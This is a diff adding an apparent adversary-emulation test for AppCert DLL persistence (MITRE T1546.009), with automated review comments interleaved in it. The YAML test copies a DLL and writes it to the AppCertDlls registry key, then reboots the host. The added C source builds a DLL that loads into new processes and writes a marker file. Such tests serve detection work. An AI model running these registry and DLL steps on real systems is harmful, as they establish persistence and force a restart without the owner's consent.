diff --git a/atomics/T1546.009/T1546.009.yaml b/atomics/T1546.009/T1546.009.yaml
new file mode 100644
index 00000000..3562899d
--- /dev/null
+++ b/atomics/T1546.009/T1546.009.yaml
@@ -0,0 +1,24 @@
+attack_technique: T1546.009
+display_name: 'Event Triggered Execution: AppCert DLLs'
+atomic_tests:
+- name: Create registry persistence via AppCert DLL
+ description: |
+ Creates a new 'AtomicTest' value pointing to an AppCert DLL in the AppCertDlls registry key.
+ Once the computer restarted, the DLL will be loaded in multiple processes and write an
+ 'AtomicTest.txt' file in C:\Users\Public\ to validate that the DLL executed succesfully.
+
+ Reference: https://skanthak.homepage.t-online.de/appcert.html
+
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ Copy-Item $PathToAtomicsFolder\T1546.009\bin\AtomicTest.dll C:\Users\Public\AtomicTest.dll -Force
+ reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\AppCertDlls" /v "AtomicTest" /t REG_EXPAND_SZ /d "C:\Users\Public\AtomicTest.dll" /f
+ Restart-Computer
+ cleanup_command: |
+ reg delete "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\AppCertDlls" /v "AtomicTest" /f
+ Remove-Item C:\Users\Public\AtomicTest.dll -Force
+ Remove-Item C:\Users\Public\AtomicTest.txt -Force
+ name: powershell
+ elevation_required: true
diff --git a/atomics/T1546.009/bin/AtomicTest.dll b/atomics/T1546.009/bin/AtomicTest.dll
new file mode 100644
index 00000000..e0370e96
Binary files /dev/null and b/atomics/T1546.009/bin/AtomicTest.dll differ
diff --git a/atomics/T1546.009/src/AtomicTest.c b/atomics/T1546.009/src/AtomicTest.c
new file mode 100644
index 00000000..665494de
--- /dev/null
+++ b/atomics/T1546.009/src/AtomicTest.c
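Review bot: The cleanup_command only deletes the `AtomicTest` value, but `reg add` creates the `AppCertDlls` key when it is absent, so on a host where the key did not exist the test leaves an empty AppCertDlls key behind; the executor should record whether the key existed before the add (for example with `reg query "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\AppCertDlls" >nul 2>&1`) and the cleanup should remove the key only in that case, never a pre-existing key that may hold other values. The executor also reboots the host unconditionally with `Restart-Computer`, which the description should state explicitly, together with the fact that until cleanup runs the DLL is loaded into new processes from the user-writable `C:\Users\Public\` path — the observable a detection engineer would key on. In the description, `succesfully` should be `successfully` and `Once the computer restarted` reads better as `Once the computer has restarted`.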
@@ -0,0 +1,52 @@
+/*
+ Atomic Test T1546.009
+
+ Author: traceflow (Twitter: @traceflow_ Email: traceflow@0x8d.cc)
+ https://github.com/tr4cefl0w
+
+ Credits: https://skanthak.homepage.t-online.de/appcert.html
+*/
+
+
+#include
+#include
+
+#pragma comment(lib, "user32")
+
+typedef enum _REASON
+{
+ PROCESS_CREATION_QUERY = 1,
+ PROCESS_CREATION_ALLOWED = 2,
+ PROCESS_CREATION_DENIED = 3
+} REASON;
+
+LPCWSTR target = L"C:\\Windows\\System32\\cmd.exe";
+
+void Run(LPCWSTR lpApplicationName) {
+ CreateFile("C:\\Users\\Public\\AtomicTest.txt", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
+ return;
+}
+
+NTSTATUS NTAPI CreateProcessNotify(LPCWSTR lpApplicationName, REASON enReason) {
+ NTSTATUS ntStatus = 0x00000000; // STATUS_SUCCESS
+
+ int result = lstrcmpiW(target, lpApplicationName);
+ if(result) {
+ Run(lpApplicationName);
+ }
+ return ntStatus;
+}
+
+BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReversed) {
+ switch ( fdwReason ) {
+ case DLL_PROCESS_ATTACH:
+ break;
+ case DLL_THREAD_ATTACH:
+ break;
+ case DLL_THREAD_DETACH:
+ break;
+ case DLL_PROCESS_DETACH:
+ break;
+ }
+ return TRUE;
+}
\ No newline at end of file
diff --git a/atomics/T1546.009/src/AtomicTest.def b/atomics/T1546.009/src/AtomicTest.def
new file mode 100644
index 00000000..82f9bb08
--- /dev/null
+++ b/atomics/T1546.009/src/AtomicTest.def
@@ -0,0 +1,2 @@
+EXPORTS
+ CreateProcessNotify
\ No newline at end of file
diff --git a/atomics/T1546.009/src/build.bat b/atomics/T1546.009/src/build.bat
new file mode 100644
index 00000000..e87c0a8c
--- /dev/null
+++ b/atomics/T1546.009/src/build.bat
@@ -0,0 +1 @@
+cl.exe /W0 /D_USRDLL /D_WINDLL AtomicTest.c AtomicTest.def /MT /link /DLL /OUT:AtomicTest.dll
\ No newline at end of file
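Review bot: `Run` never closes the handle returned by `CreateFile`, and because the AppCert callback runs inside every process that loads the DLL, each such process leaks one file handle per process creation it observes; replace the call with `HANDLE h = CreateFileA("C:\\Users\\Public\\AtomicTest.txt", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); if (h != INVALID_HANDLE_VALUE) CloseHandle(h);`, using `CreateFileA` explicitly since the path literal is narrow and the generic macro only resolves to it when UNICODE is undefined. The condition in `CreateProcessNotify` also looks inverted: `lstrcmpiW` returns 0 on a match, so `if(result)` calls `Run` for every application name except `target` (cmd.exe); if the intent is to react only to cmd.exe it should read `if (result == 0)`, otherwise a comment should state that the marker file is written for all processes but cmd.exe. The two `#include` lines carry no header name in this rendering, presumably stripped by the page; confirm the source includes `<windows.h>`. `lpReversed` in the DllMain signature is presumably a typo for `lpReserved`.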
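Review bot: `/W0` disables every compiler warning, so problems such as the unused `lpApplicationName` parameter in `Run` and the unused `enReason` parameter in `CreateProcessNotify` in AtomicTest.c are never reported; build with `/W4` (and `/WX` if the repository's other builds do) and silence individual warnings explicitly where needed. Switching to `cl.exe /W4 /D_USRDLL /D_WINDLL AtomicTest.c AtomicTest.def /MT /link /DLL /OUT:AtomicTest.dll` keeps the rest of the command unchanged.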